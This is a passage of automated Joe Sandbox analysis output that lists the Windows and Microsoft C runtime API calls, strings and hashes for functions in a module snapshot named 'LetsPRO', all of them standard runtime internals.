                                        • DecodePointer.KERNEL32(00000000,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB99
                                        • _initptd.MSVCR100(00000000,00000000,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BBA4
                                          • Part of subcall function 6C901ECB: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C901F68,00000008,6C927629,00000000,00000000), ref: 6C901EDC
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000D), ref: 6C901F10
                                          • Part of subcall function 6C901ECB: InterlockedIncrement.KERNEL32(?), ref: 6C901F1D
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000C), ref: 6C901F31
                                        • GetCurrentThreadId.KERNEL32 ref: 6C90BBAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$DecodeHandleModule_lock$AllocCurrentIncrementInterlockedThreadValue__init_pointers__initp_misc_winsig_calloc_crt_encoded_null_initptd
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3305441573-3819984048
                                        • Opcode ID: f79301eb3ba14f85607561614fcd6079c987a3c308b61a7d413381151fd52ce3
                                        • Instruction ID: a424199c42b4e5f5bec8217dc52f6c845a94d39ad846dfabbae82422c92d925c
                                        • Opcode Fuzzy Hash: f79301eb3ba14f85607561614fcd6079c987a3c308b61a7d413381151fd52ce3
                                        • Instruction Fuzzy Hash: 86315E71B096509FDF10AFF4BC04E0D3BFAAF96A59730152AE424D2A94EB78C405EF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C8F12D7
                                        • free.MSVCR100(?), ref: 6C8F131B
                                        • _malloc_crt.MSVCR100(00000004), ref: 6C90672F
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • _calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6C90673F
                                        • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6C90674A
                                        • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6C906755
                                        • _calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6C906764
                                        • GetCPInfo.KERNEL32(?,?), ref: 6C9067B7
                                        • ___crtGetStringTypeA.LIBCMT ref: 6C9067FB
                                        • __crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6C90682E
                                        • __crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6C90685B
                                        • memcpy.MSVCR100(?,?,000000FE), ref: 6C9068B5
                                        • memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6C9068C4
                                        • memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6C9068D6
                                        • free.MSVCR100(?), ref: 6C90692B
                                          • Part of subcall function 6C90017E: HeapFree.KERNEL32(00000000,00000000,?,6C927642,00000000), ref: 6C900194
                                        • free.MSVCR100(?,?), ref: 6C930ADD
                                        • free.MSVCR100(?,?,?), ref: 6C930AE5
                                        • free.MSVCR100(?,?,?,?), ref: 6C930AED
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_calloc_crt$Stringmemcpy$__crt$DecrementFreeHeapInfoInterlockedType___crt_malloc_crtmalloc
                                        • String ID:
                                        • API String ID: 3303389740-0
                                        • Opcode ID: 483a79d31b1b904ec80ff72754208b5c49c5e86005e722a38dcdaf4a33ad7d80
                                        • Instruction ID: 409f706bc27e2b018cc688eb3cadd5572ddad8aaae20f7731afb1f2eb537ec42
                                        • Opcode Fuzzy Hash: 483a79d31b1b904ec80ff72754208b5c49c5e86005e722a38dcdaf4a33ad7d80
                                        • Instruction Fuzzy Hash: C8B17DB1E012459FDB10CFA9C880BEEBBF8BF19304F10456DE869A7A40D775D985CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9121FD
                                        • wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C912208
                                        • _calloc_crt.MSVCR100(00000002,00000002), ref: 6C912227
                                        • wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6C91223E
                                        • wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6C91225B
                                          • Part of subcall function 6C911F9A: wcschr.MSVCR100(00000000,0000003D,7591DF80,00000000,021F17E8), ref: 6C911FC5
                                          • Part of subcall function 6C911F9A: free.MSVCR100(?,7591DF80,00000000,021F17E8), ref: 6C912038
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C912299
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9122B5
                                        • _calloc_crt.MSVCR100(00000000,00000001), ref: 6C9122C2
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9122DB
                                        • _strlen.LIBCMT(00000000), ref: 6C9122ED
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C91230B
                                        • _errno.MSVCR100 ref: 6C912330
                                        • _errno.MSVCR100(?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C93103E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931049
                                        • wcschr.MSVCR100(?,0000003D,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931059
                                        • wcsnlen.MSVCR100(-00000002,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C93107D
                                        • _wcslen.LIBCMT(?,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931089
                                        • _calloc_crt.MSVCR100(00000001,00000002,?,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931094
                                        • wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6C9310AA
                                        • _errno.MSVCR100(?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9310B7
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9310C2
                                        • free.MSVCR100(00000000), ref: 6C9310DD
                                        • free.MSVCR100(?), ref: 6C9310FF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$_strlen_wcslen
                                        • String ID:
                                        • API String ID: 928254730-0
                                        • Opcode ID: 6accdf45689de75eca33cb8702b87bccca2540fa238bf9f7cb4534f301686aa1
                                        • Instruction ID: 38c9ddf5421dabb16c004dd741bd17e610e18ef5a2650227ff4f712f0e956c0f
                                        • Opcode Fuzzy Hash: 6accdf45689de75eca33cb8702b87bccca2540fa238bf9f7cb4534f301686aa1
                                        • Instruction Fuzzy Hash: 5E513B31A0A559FBCB155FA48C89DDF3A6CEF27B78F304119F02896E90DB35C641C6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _FindAndUnlinkFrame.MSVCR100(?), ref: 6C9185A0
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C918417
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C91842B
                                        • _getptd.MSVCR100 ref: 6C9185B6
                                        • _getptd.MSVCR100 ref: 6C9185C5
                                        • _getptd.MSVCR100 ref: 6C9185D6
                                        • _getptd.MSVCR100 ref: 6C9185EA
                                        • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6C9185F8
                                          • Part of subcall function 6C9183EA: _getptd.MSVCR100 ref: 6C9183EF
                                        • _getptd.MSVCR100(00000001), ref: 6C918604
                                        • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6C91860F
                                        • _getptd.MSVCR100 ref: 6C918616
                                        • _getptd.MSVCR100 ref: 6C918625
                                        • _getptd.MSVCR100 ref: 6C918636
                                        • _getptd.MSVCR100 ref: 6C918654
                                        • _getptd.MSVCR100 ref: 6C918662
                                        • _getptd.MSVCR100 ref: 6C92CA92
                                        • _getptd.MSVCR100 ref: 6C92CAAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                        • String ID: csm
                                        • API String ID: 473968603-1018135373
                                        • Opcode ID: 0b0a7cf99c80eaab02eea8b4df439e334946c750bc95c8a824b5b383d971068c
                                        • Instruction ID: fa6ae1b2c3c9326881fda23792b340854bcebd546911034292e716f64bcf33c8
                                        • Opcode Fuzzy Hash: 0b0a7cf99c80eaab02eea8b4df439e334946c750bc95c8a824b5b383d971068c
                                        • Instruction Fuzzy Hash: 07315E34608604CFC748AF15C485EE937A8AF2035AF8680BAD05D8BE62DF74D989DF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C9524BF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9524CA
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C9524EF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9524FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID: PATH
                                        • API String ID: 1328987296-1036084923
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • operator+.LIBCMT ref: 6C9762F6
                                          • Part of subcall function 6C975AB7: DName::DName.LIBCMT ref: 6C975ACA
                                          • Part of subcall function 6C975AB7: DName::operator+.LIBCMT ref: 6C975AD1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::Name::operator+operator+
                                        • String ID:
                                        • API String ID: 2937105810-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcschr.MSVCR100(00000000,0000003D,7591DF80,00000000,021F17E8), ref: 6C911FC5
                                        • free.MSVCR100(?,7591DF80,00000000,021F17E8), ref: 6C912038
                                        • _errno.MSVCR100(7591DF80,00000000,021F17E8), ref: 6C917490
                                        • _errno.MSVCR100(021F17E8), ref: 6C9314DB
                                        • _invalid_parameter_noinfo.MSVCR100(021F17E8), ref: 6C9314E6
                                        • ___mbtow_environ.LIBCMT ref: 6C931518
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$___mbtow_environ_invalid_parameter_noinfofreewcschr
                                        • String ID:
                                        • API String ID: 3080074160-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT(?,000000FF,00000024), ref: 6C91698D
                                        • _get_daylight.MSVCR100(?), ref: 6C9169C9
                                        • _get_dstbias.MSVCR100(?), ref: 6C9169DB
                                        • _get_timezone.MSVCR100(?), ref: 6C9169ED
                                        • _gmtime64_s.MSVCR100(?,?), ref: 6C916A21
                                        • _errno.MSVCR100 ref: 6C916A47
                                        • _gmtime64_s.MSVCR100(?,?), ref: 6C916A53
                                        • _errno.MSVCR100 ref: 6C929E31
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C929E3B
                                        • _errno.MSVCR100 ref: 6C929E47
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C929E51
                                        • _gmtime64_s.MSVCR100(?,?), ref: 6C929E8A
                                        • __allrem.LIBCMT ref: 6C929EF5
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929F11
                                        • __allrem.LIBCMT ref: 6C929F28
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929F46
                                        • __allrem.LIBCMT ref: 6C929F5D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
                                        • String ID:
                                        • API String ID: 3568092448-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DName::DName.LIBCMT ref: 6C92D3FA
                                        • DName::DName.LIBCMT ref: 6C92D42F
                                        • atol.MSVCR100(6C90EA8C,6C90EA8C,00000010,FFFF0000,00000000,00000000), ref: 6C92D4B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::$atol
                                        • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                        • API String ID: 2083219425-3945972591
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C9403CA: TlsGetValue.KERNEL32(6C9361E5), ref: 6C9403DC
                                        • TlsGetValue.KERNEL32 ref: 6C94A7C9
                                        • DebugBreak.KERNEL32 ref: 6C94A7D3
                                        • GetCurrentThreadId.KERNEL32 ref: 6C94A80B
                                        • swprintf.LIBCMT(?,00000400,[%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d),00000000), ref: 6C94A83B
                                        • _fwprintf.LIBCMT(?), ref: 6C94A87D
                                        • fflush.MSVCR100(?), ref: 6C94A888
                                        • OutputDebugStringW.KERNEL32(?), ref: 6C94A897
                                        • DebugBreak.KERNEL32 ref: 6C94A89D
                                        • exit.MSVCR100(000000F8), ref: 6C94A8A5
                                        Strings
                                        • [%d] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6C94A851
                                        • [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6C94A8B0, 6C94A82A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Debug$BreakValue$CurrentOutputStringThread_fwprintfexitfflushswprintf
                                        • String ID: [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d)$[%d] %S: !!!!!!!Assert Failed(%S: %d)
                                        • API String ID: 1172176910-813932914
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93B9E1
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000020,6C93B9AC,00000000,6C9A55E4,0000000C,6C9401F1,F3B6147F,?,?), ref: 6C93BA11
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6C93BA50
                                        • TlsAlloc.KERNEL32 ref: 6C93BA5A
                                        • GetLastError.KERNEL32 ref: 6C93BA68
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BA80
                                        • _CxxThrowException.MSVCR100(6C90C83C,6C90C8D8,?,00000001), ref: 6C93BA8E
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,FlushProcessWriteBuffers), ref: 6C93BAA1
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BAA8
                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 6C93BADB
                                        • std::exception::exception.LIBCMT(?,00000001), ref: 6C93BAFB
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C93BB28
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C93BB43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocCountCriticalInitializeSectionSpin$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionH_prolog3HandleLastModuleProcThrowVirtualstd::exception::exception
                                        • String ID: FlushProcessWriteBuffers$bad allocation$kernel32.dll
                                        • API String ID: 2685218194-103648123
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(0000000C,6C97E990,00000020), ref: 6C97E7B1
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97E7E8
                                        • _calloc_crt.MSVCR100(?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C97E7FB
                                        • __cftoe.LIBCMT(?,00000000,00000000,?,7FFFFFFF,6C97E990,00000020), ref: 6C97E7CD
                                          • Part of subcall function 6C905E40: _wcstombs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6C905E56
                                        • __cftoe.LIBCMT(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 6C97E816
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C97E831
                                        • setlocale.MSVCR100(?,00000000,6C97E990,00000020), ref: 6C97E841
                                        • free.MSVCR100(00000000,?,00000000,6C97E990,00000020), ref: 6C97E84A
                                        • _getptd.MSVCR100 ref: 6C97E85B
                                        • _mbstowcs_s_l.MSVCR100(00000000,00000000,00000000,?,00000000,?), ref: 6C97E880
                                        • _malloc_crt.MSVCR100(?), ref: 6C97E8B9
                                        • _mbstowcs_s_l.MSVCR100(00000000,00000004,?,?,000000FF,?), ref: 6C97E8DD
                                        • free.MSVCR100(00000000), ref: 6C97E900
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C97E91E
                                        • free.MSVCR100(?), ref: 6C97E92B
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C97E94B
                                        • free.MSVCR100(?), ref: 6C97E958
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$DecrementInterlocked__cftoe_mbstowcs_s_l$CriticalEnterSection__invoke_watson_calloc_crt_getptd_lock_malloc_crt_wcstombs_s_lsetlocale
                                        • String ID:
                                        • API String ID: 662105381-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _CxxThrowException.MSVCR100(?,6C9A0D0C), ref: 6C937943
                                          • Part of subcall function 6C918728: RaiseException.KERNEL32(?,?,6C92F35F,?,?,?,?,?,6C92F35F,?,6C90C8D8,6C9A8518), ref: 6C918767
                                        • std::exception::exception.LIBCMT ref: 6C93797D
                                        • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(00000001,F3B6147F,00000000,?,?), ref: 6C937998
                                        • std::exception::exception.LIBCMT ref: 6C93792C
                                          • Part of subcall function 6C9736DA: std::exception::_Copy_str.LIBCMT(6C942185,?,?,6C942185,6C941FF3,?,6C941FF3,00000001), ref: 6C9736F5
                                        • std::exception::exception.LIBCMT ref: 6C9379D2
                                        • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,?,00000000,?,00000000,F3B6147F,00000000,?,?), ref: 6C937A39
                                          • Part of subcall function 6C93AEF0: __EH_prolog3.LIBCMT ref: 6C93AEF7
                                        • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6C937AAA
                                        • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6C937AFF
                                        • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,6C937E59,00000000,000000FF,00000000,00000020), ref: 6C937B69
                                        • CreateTimerQueueTimer.KERNEL32(00000010,00000000,6C937E59,00000000,000000FF,00000000,00000020), ref: 6C937B74
                                        • std::exception::exception.LIBCMT(?,00000001), ref: 6C937B90
                                        • ?Block@Context@Concurrency@@SAXXZ.MSVCR100 ref: 6C937BB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@Exception$??0scoped_lock@critical_section@?wait@event@Block@Context@Copy_strCreateH_prolog3QueueQueue@details@RaiseSharedThrowV12@@std::exception::_
                                        • String ID: bad allocation$pEvents
                                        • API String ID: 3019020058-4135266256
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
